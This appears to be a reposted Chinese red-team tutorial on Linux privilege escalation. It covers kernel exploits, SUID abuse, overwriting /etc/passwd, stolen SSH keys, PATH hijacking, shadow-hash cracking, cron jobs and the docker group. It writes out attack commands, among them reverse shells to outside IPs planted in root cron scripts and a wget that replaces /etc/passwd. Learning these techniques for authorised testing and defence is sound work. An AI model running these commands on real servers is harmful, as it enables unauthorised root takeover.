HW之红队常见Linux的几种提权方法

前言

不管是 Windows 提权还是 Linux 提权,方法都非常之多,实际情况下,还是需要根据对应的情况选择对应的提权方法,今天就Linux常见的几种提权方式做个整理

Linux常见的几种提权方法

提权,提高自己在服务器中的权限,主要针对网站入侵过程中,当渗透某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限,通常提权是把普通用户的权限提升到管理员权限或者系统权限,在渗透测试过程中,拿到一个webshell之后,一般来说,我们的权限都是目标服务器中间件的权限。

这个时候就需要利用各种漏洞来提升自己的权限,从而能够获得对目标服务器的控制。

1.内核溢出提权
简介

利用堆栈溢出漏洞,根据当前系统 寻找对应的漏洞的exp 使用exp对其进行提权。

复现
第一步:查看目标系统的相关信息
uname -a #查看内核/操作系统/cpu信息
cat /proc/version #查看系统信息
cat /etc/issue #查看操作系统版本
lsb_release -a #查询系统版本等信息

第二步:使用searchsploit工具寻找对应的exp

searchsploit -t 3.19
1.png
searchsploit -x linux/local/37292.c
2.1.png

第三步:让目标机器远程下载exp文件

3.png

第四步:将exp文件进行编译

2.png

第五步:执行exp文件,提权成功

4.png

2.Linux suid提权

简介

SUID是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。

也就是如果ROOT用户给某个可执行文件加了S权限,那么该执行程序运行的时候将拥有ROOT权限。

复现过程

第一步:发现系统上运行的所有SUID可执行文件

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;
5.png

第二步:利用带s的文件执行本地sh’shell

6.png

ps:常见的suid提权文件:nmap、vim、find、more、less、bash、cp、Nano、mv、awk、man、weget

3.passwd提权

简介

基础知识/etc/passwd: 文件中的详细信息格式

7.png
复现

第一步:通过OpenSSL命令,生成一个新的用户oooohack,密码为hack123

openssl passwd -1 -salt oooohacker hack123

将/etc/passwd文件内容复制出来,然后将第一步的结果进行追加到passwd文件中

8.png

第二步:让目标远程下载文件,并覆盖原先的passwd文件

wget http://192.168.0.134/passwd -O /etc/passwd

9.png

第三步:切换用户,提权成功

10.png

4.ssh密钥提权

简介

ssh是一种加密的网络传输协议。可在不安全的网络中为网络服务提供安全的传输环境。

SSH通过在网络中创建安全隧道来实现SSH客户端与服务器之间的连接。

SSH最常见的用途是远程登录系统,人们通常利用SSH来传输命令行界面和远程执行命令。

使用频率最高的场合类Unix系统,但是Windows操作系统也能有限度地使用SSH。

2015年,微软宣布将在未来的操作系统中提供原生SSH协议支持,Windows 10 1809 版本已提供可手动安装的 OpenSSH工具。总的来说是一个传输协议,默认端口22

复现

第一步:cat /etc/passwd | grep bash # 过滤出含bash的用户

11.png

第二步:ls /home/web1 # 查看用户目录下的文件,寻找.ssh

12.png

第三步:进入.ssh,对比authrizid_keys和id_rsa.pub,若一致则说明公钥相同

13.png

第四步:将公钥对应的私钥文件复制

14.png

第五步:保存,并且设置权限

15.png

第六步:利用ssh直接进行远程登陆,提权成功

16.png

5.环境劫持提权

简介

环境劫持需要的两个条件 存在带有suid的文件 suid文件存在系统命令

复现过程

第一步:寻找suid文件

find / -perm -u=s -type f 2>/dev/null
17.png

第二步:查看suid文件里面执行的是哪些命令,要能够被我们所利用,比如ps命令

18.png

第三步:新建一个文件,文件内容为:/bin/bash,文件名是ps,设置环境变量的改变,提权成功

19.png

6.john破解shadow root密文登录提权

简介

需要一定的权限,将shodow文件中的root密文复制到一个新的文件中,使用工具破解即可。

复现过程

第一步:直接使用工具

20.png

7.Ubuntu计划任务反弹shell提权

简介

利用计划任务,和windows里面的开机启动任务类似。

复现过程

第一步:当获取一个linux普通用户的时,查看计划任务

21.png

第二步:cat /etc/crontab 查看当前用户的任务

12.png
发现计划任务的执行文件,定位到这个文件
/usr/local/schedule.sh

修改文件内容

bash -c 'exec bash -i &>/dev/tcp/192.168.93.129/5566 <&1'

第三步:tail -f /var/log/syslog,查看日志文件 发现root每一分钟会执行一次 cleanup.py文件

23.png

第四步:更改cleanup.py文件里面的内容,做一个反弹shell。提权成功

bash -i >& /dev/tcp/192.168.0.109/6666 0>&1
24.png

8.docker 提权

简介

docker运行的所有命令都是需要sudo来运行,那是因为docker需要root权限才能跑。

Docker监护进程有一个特性,它能被允许访问root用户或者是在docker组里面的所有用户。

这就意味着,有docker 组的权限就如同到root的访问权,而且不需要知道密码。

复现

第一步:查看目标机器是否使用了docker

cat linux.txt | grep docker
25.png

第二步:查询当前用户信息和组信息,查询是否存在docker组

26.png

第三步:利用docker,将mnt目录挂载到宿主的根目录,提权成功

docker run -v /:/mnt -it alpine

27.png

原文链接:https://blog.csdn.net/hackzkaq/article/details/125047703

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,377评论 6 496
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,390评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 159,967评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,344评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,441评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,492评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,497评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,274评论 0 269
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,732评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,008评论 2 328
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,184评论 1 342
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,837评论 4 337
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,520评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,156评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,407评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,056评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,074评论 2 352

推荐阅读更多精彩内容